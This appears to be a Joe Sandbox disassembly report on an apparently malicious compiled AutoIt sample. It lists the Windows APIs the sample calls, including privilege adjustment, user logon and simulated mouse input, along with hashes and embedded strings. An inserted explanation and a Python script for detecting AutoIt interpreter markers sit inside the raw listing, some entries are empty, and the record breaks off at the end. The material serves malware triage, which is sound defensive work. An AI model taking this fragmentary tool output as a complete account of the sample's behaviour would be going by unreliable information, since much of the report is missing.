                                                  • Opcode ID: 65c1e5382733702137950696af9e667c3afdbd7df77fc76051da561bacc27cb8
                                                  • Instruction ID: 82670df82e6f6eac203977893a5b84262759f469cf477ce67c9d6d679137c0e9
                                                  • Opcode Fuzzy Hash: 65c1e5382733702137950696af9e667c3afdbd7df77fc76051da561bacc27cb8
                                                  • Instruction Fuzzy Hash: 7D411571910209BFEF20DE96DC81FBFB7FCEB40324F10406AF615A6150EB759E419A50
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C2B40B
                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C2B465
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C2B4B2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DiskFreeSpace
                                                  • String ID:
                                                  • API String ID: 1682464887-0
                                                  • Opcode ID: 7fd1c7d1ce2af90e4d298f214a8baaa990dd8b887d7e9324d27028ea88879839
                                                  • Instruction ID: de680822307a81d37700c1d29649962b506edf0c21fb3b634243533e5b19be82
                                                  • Opcode Fuzzy Hash: 7fd1c7d1ce2af90e4d298f214a8baaa990dd8b887d7e9324d27028ea88879839
                                                  • Instruction Fuzzy Hash: BB213E35A00518EFDB00EFA5E884FEEBBB8FF49314F1480A9E905AB351DB319956CB51
                                                  APIs
                                                    • Part of subcall function 00BE0DB6: std::exception::exception.LIBCMT ref: 00BE0DEC
                                                    • Part of subcall function 00BE0DB6: __CxxThrowException@8.LIBCMT ref: 00BE0E01
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C1882B
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C18858
                                                  • GetLastError.KERNEL32 ref: 00C18865
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1922334811-0
                                                  • Opcode ID: 8cf89b1780744fa3ee559b0c062d46bc4be31e591b3268d0ee20994d652e1bdc
                                                  • Instruction ID: 522e1b1026abd617ccbdb663130125bf3c384a196675a3ff7174a7e65e4f2488
                                                  • Opcode Fuzzy Hash: 8cf89b1780744fa3ee559b0c062d46bc4be31e591b3268d0ee20994d652e1bdc
                                                  • Instruction Fuzzy Hash: A111BFB2814205AFE718EFA4DC85E6BB7F8FB45310B20852EF45583241EB70BC818B60
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C18774
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C1878B
                                                  • FreeSid.ADVAPI32(?), ref: 00C1879B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: 3ccd61f5e8bc377154bff73b37e578d97dd987fa1ba9c81cf689fb63a4d16487
                                                  • Instruction ID: 31c122ce16e8961d60b83298125e34c040ae31f42fc68556efd9f41df03a24c0
                                                  • Opcode Fuzzy Hash: 3ccd61f5e8bc377154bff73b37e578d97dd987fa1ba9c81cf689fb63a4d16487
                                                  • Instruction Fuzzy Hash: A7F04979A1130CBFDF00DFF4DC89AAEBBBCFF09211F1044A9A901E2281E7756A448B50
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C2C6FB
                                                  • FindClose.KERNEL32(00000000), ref: 00C2C72B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 702cfecb339a5d04c1720737ebff918ec3669d95d708cca887de7c1cd1b98ad8
                                                  • Instruction ID: 7432e8d45fd62710a09a352a4aed033775cd515692a6bafd16bf3bdea2c07f48
                                                  • Opcode Fuzzy Hash: 702cfecb339a5d04c1720737ebff918ec3669d95d708cca887de7c1cd1b98ad8
                                                  • Instruction Fuzzy Hash: 5B118E766006009FDB10DF29D889A2EF7E9FF85760F00855DF9A9872A1DB30A801CB81
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C39468,?,00C4FB84,?), ref: 00C2A097
                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C39468,?,00C4FB84,?), ref: 00C2A0A9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: b26402bc40d67854fc33c53f68ecd5c7fe4d5d36b8335633a8bfe3b1c10ff7d5
                                                  • Instruction ID: fe1e36fb2f5075a2b21e7a133c33989cba12dd4a23da288989b12faa59c1c244
                                                  • Opcode Fuzzy Hash: b26402bc40d67854fc33c53f68ecd5c7fe4d5d36b8335633a8bfe3b1c10ff7d5
                                                  • Instruction Fuzzy Hash: E1F0E23510422DABDB209FA4DC48FEE736CBF09361F0082AAF909D3181CA709A04CBA1
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C18309), ref: 00C181E0
                                                  • CloseHandle.KERNEL32(?,?,00C18309), ref: 00C181F2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: 12fca1a43c6ac5cad3d57e1b6c9d9af00d092849d8560d95e219da8836f6021f
                                                  • Instruction ID: e71fb896cd795e861a2e0a707a77bf38dcb966096532d510c628bf7a3389e84e
                                                  • Opcode Fuzzy Hash: 12fca1a43c6ac5cad3d57e1b6c9d9af00d092849d8560d95e219da8836f6021f
                                                  • Instruction Fuzzy Hash: D5E0E676014510AFE7262B61EC05E7777E9FF05310714887DF46584470DB615CD1DB10
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BE8D57,?,?,?,00000001), ref: 00BEA15A
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00BEA163
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 45a34bd18eddb4fac42f012e061776d7a6bba721e9161c629bec240714128dd4
                                                  • Instruction ID: 04ac208ba357b859e73ff42278c449a4342b67131382388673fcd02461c19c71
                                                  • Opcode Fuzzy Hash: 45a34bd18eddb4fac42f012e061776d7a6bba721e9161c629bec240714128dd4
                                                  • Instruction Fuzzy Hash: F1B09235054208ABCA002F91EC09F8C3F68FB46AA2F404024F60D84070CB6254528A91
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  APIs
                                                  • __time64.LIBCMT ref: 00C2889B
                                                    • Part of subcall function 00BE520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C28F6E,00000000,?,?,?,?,00C2911F,00000000,?), ref: 00BE5213
                                                    • Part of subcall function 00BE520A: __aulldiv.LIBCMT ref: 00BE5233
                                                  APIs
                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C24C76
                                                  APIs
                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C18389), ref: 00C187D1
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00BEA12A
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,00C4F910), ref: 00C43627
                                                  • IsWindowVisible.USER32(?), ref: 00C4364B
                                                  Strings
                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 00C4A630
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C4A661
                                                  • GetSysColor.USER32(0000000F), ref: 00C4A66D
                                                  • SetBkColor.GDI32(?,000000FF), ref: 00C4A687
                                                  • SelectObject.GDI32(?,00000000), ref: 00C4A696
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00C4A6C1
                                                  • GetSysColor.USER32(00000010), ref: 00C4A6C9
                                                  • CreateSolidBrush.GDI32(00000000), ref: 00C4A6D0
                                                  • FrameRect.USER32(?,?,00000000), ref: 00C4A6DF
                                                  • DeleteObject.GDI32(00000000), ref: 00C4A6E6
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00C4A731
                                                  • FillRect.USER32(?,?,00000000), ref: 00C4A763
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C4A78E
                                                    • Part of subcall function 00C4A8CA: GetSysColor.USER32(00000012), ref: 00C4A903
                                                    • Part of subcall function 00C4A8CA: SetTextColor.GDI32(?,?), ref: 00C4A907
                                                    • Part of subcall function 00C4A8CA: GetSysColorBrush.USER32(0000000F), ref: 00C4A91D
                                                    • Part of subcall function 00C4A8CA: GetSysColor.USER32(0000000F), ref: 00C4A928
                                                    • Part of subcall function 00C4A8CA: GetSysColor.USER32(00000011), ref: 00C4A945
                                                    • Part of subcall function 00C4A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C4A953
                                                    • Part of subcall function 00C4A8CA: SelectObject.GDI32(?,00000000), ref: 00C4A964
                                                    • Part of subcall function 00C4A8CA: SetBkColor.GDI32(?,00000000), ref: 00C4A96D
                                                    • Part of subcall function 00C4A8CA: SelectObject.GDI32(?,?), ref: 00C4A97A
                                                    • Part of subcall function 00C4A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00C4A999
                                                    • Part of subcall function 00C4A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C4A9B0
                                                    • Part of subcall function 00C4A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00C4A9C5
                                                    • Part of subcall function 00C4A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C4A9ED
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?), ref: 00BC2CA2
                                                  • DeleteObject.GDI32(00000000), ref: 00BC2CE8
                                                  • DeleteObject.GDI32(00000000), ref: 00BC2CF3
                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00BC2CFE
                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00BC2D09
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00BFC43B
                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BFC474
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BFC89D
                                                    • Part of subcall function 00BC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BC2036,?,00000000,?,?,?,?,00BC16CB,00000000,?), ref: 00BC1B9A
                                                  • SendMessageW.USER32(?,00001053), ref: 00BFC8DA
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BFC8F1
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BFC907
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BFC912
                                                  Strings
                                                  • String ID: 0
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 00C374DE
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C3759D
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C375DB
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C375ED
                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C37633
                                                  • GetClientRect.USER32(00000000,?), ref: 00C3763F
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C37683
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C37692
                                                  • GetStockObject.GDI32(00000011), ref: 00C376A2
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C376A6
                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C376B6
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C376BF
                                                  • DeleteDC.GDI32(00000000), ref: 00C376C8
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C376F4
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C3770B
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C37746
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C3775A
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C3776B
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C3779B
                                                  • GetStockObject.GDI32(00000011), ref: 00C377A6
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C377B1
                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C377BB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: 51fc78a371628a63de8ed95ddee236e3921edb125bf2f8db02da4abb5788b3a1
                                                  • Instruction ID: 1667205d5b4b31fe518bd6330662f1c37dc8f6d6c58674b75ac939437bab80e7
                                                  • Opcode Fuzzy Hash: 51fc78a371628a63de8ed95ddee236e3921edb125bf2f8db02da4abb5788b3a1
                                                  • Instruction Fuzzy Hash: 85A165B5A40615BFEB14DBA4DC49FAE7BB9FB09710F004158FA15A72E0CBB0AD01CB64
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C2AD1E
                                                  • GetDriveTypeW.KERNEL32(?,00C4FAC0,?,\\.\,00C4F910), ref: 00C2ADFB
                                                  • SetErrorMode.KERNEL32(00000000,00C4FAC0,?,\\.\,00C4F910), ref: 00C2AF59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: a3fa8632f312f80a0e8df5987a6e0bce0efdd7f62dd19f73635a8af02bc09569
                                                  • Instruction ID: f98a436823c05f58547656b6181422de7878aba3f1577249b5009b5dc38071b2
                                                  • Opcode Fuzzy Hash: a3fa8632f312f80a0e8df5987a6e0bce0efdd7f62dd19f73635a8af02bc09569
                                                  • Instruction Fuzzy Hash: 6551D7B1684215EBCB10DB51EE46DBD73A1EB08710B20806BF51BA7A90CF749E07EB53
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 1038674560-86951937
                                                  • Opcode ID: b7f7cfa5a8ca66bf13c6c188f9ebcc3dffd2a73ae8b200abf79ef42577e1c260
                                                  • Instruction ID: bbacb508b6857e5e5c25a9eba5177eaba0339c490c66c2e5a9d314b81eaa1f49
                                                  • Opcode Fuzzy Hash: b7f7cfa5a8ca66bf13c6c188f9ebcc3dffd2a73ae8b200abf79ef42577e1c260
                                                  • Instruction Fuzzy Hash: F081F9B16402096ACB21AA61DC87FBE37E8EF09700F1440BCF905AB192EBB0DE45D665
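                                                   The directive strings in the entry above (#include, #requireadmin, #OnAutoItStartRegister, the "Bad directive syntax error" message) together with the window class names AutoIt v3 and AutoIt v3 GUI seen in the CreateWindowExW calls are the interpreter-stub markers behind the "likely a compiled AutoIt script" signature. The following Python triage check is an added example, not code from the Joe Sandbox report or from the AutoIt project: it searches a file for those markers in both ASCII and UTF-16LE (the interpreter hands them to wide-character APIs and compares directives with __wcsnicmp, so in the image they are stored as UTF-16LE). The constructed sample buffer, the threshold of three markers and the function names are assumptions.

```python
import sys

# Marker strings taken from the API/string listing of the dumped AutoIt
# interpreter: window class names and script directives. They are passed to
# wide-character APIs (CreateWindowExW, __wcsnicmp), so the binary stores them
# as UTF-16LE; ASCII is checked as well in case a sample stores them narrow.
AUTOIT_MARKERS = (
    "AutoIt v3",                  # class name of the splash/progress window
    "AutoIt v3 GUI",              # class name of script-created GUI windows
    "#OnAutoItStartRegister",
    "#requireadmin",
    "#notrayicon",
    "#pragma compile",
    "#include-once",
    "Bad directive syntax error",
    "Unterminated group of comments",
)

# Assumed threshold: demand several independent markers before flagging,
# since a short string such as "AutoIt v3" alone is weak evidence. Note that
# "AutoIt v3" is a prefix of "AutoIt v3 GUI" and so matches whenever it does.
DEFAULT_MIN_MARKERS = 3


def find_autoit_markers(data: bytes) -> dict[str, list[str]]:
    """Map each marker present in data to the encodings it was found in."""
    hits: dict[str, list[str]] = {}
    for marker in AUTOIT_MARKERS:
        encodings = []
        if marker.encode("ascii") in data:
            encodings.append("ascii")
        if marker.encode("utf-16-le") in data:
            encodings.append("utf-16le")
        if encodings:
            hits[marker] = encodings
    return hits


def looks_like_compiled_autoit(data: bytes, min_markers: int = DEFAULT_MIN_MARKERS) -> bool:
    """Triage signal only: the markers identify the AutoIt interpreter stub,
    which benign AutoIt-compiled tools also carry, not the embedded script."""
    return len(find_autoit_markers(data)) >= min_markers


def scan_file(path: str, min_markers: int = DEFAULT_MIN_MARKERS) -> tuple[bool, dict[str, list[str]]]:
    """Read a file and return (verdict, markers found)."""
    with open(path, "rb") as fh:
        data = fh.read()
    return looks_like_compiled_autoit(data, min_markers), find_autoit_markers(data)


# Constructed stand-in for a PE image: a DOS-header prefix followed by three of
# the markers stored UTF-16LE with NUL terminators, as the interpreter does.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + "AutoIt v3 GUI".encode("utf-16-le") + b"\x00\x00"
    + "#requireadmin".encode("utf-16-le") + b"\x00\x00"
    + "Bad directive syntax error".encode("utf-16-le") + b"\x00\x00"
)

if __name__ == "__main__":
    targets = sys.argv[1:]
    if not targets:
        hits = find_autoit_markers(SAMPLE)
        verdict = looks_like_compiled_autoit(SAMPLE)
        print("constructed sample:", "AutoIt stub" if verdict else "no match", hits)
    for target in targets:
        verdict, hits = scan_file(target)
        print(f"{target}: {'AutoIt stub' if verdict else 'no match'} ({len(hits)} markers)")
        for marker, encodings in hits.items():
            print(f"  {marker!r}: {', '.join(encodings)}")
```

                                                   Run it as `python autoit_triage.py new.exe` to list which markers a sample carries; with no argument it scans the constructed buffer. A hit tells you the file wraps the AutoIt interpreter, which is exactly what the sandbox signature states and no more: the malicious script itself is a separate resource that still has to be extracted and read.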
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C49AD2
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C49B8B
                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00C49BA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: 0
                                                  • API String ID: 2326795674-4108050209
                                                  • Opcode ID: a12944eaadd9eda098627494dbf399f36c7b1fad0b24c8d5f50cd2f1addd7edb
                                                  • Instruction ID: 0323dd1e8200e3440721821d4cbeda78098956ce90ee3dc65d52a89017530131
                                                  • Opcode Fuzzy Hash: a12944eaadd9eda098627494dbf399f36c7b1fad0b24c8d5f50cd2f1addd7edb
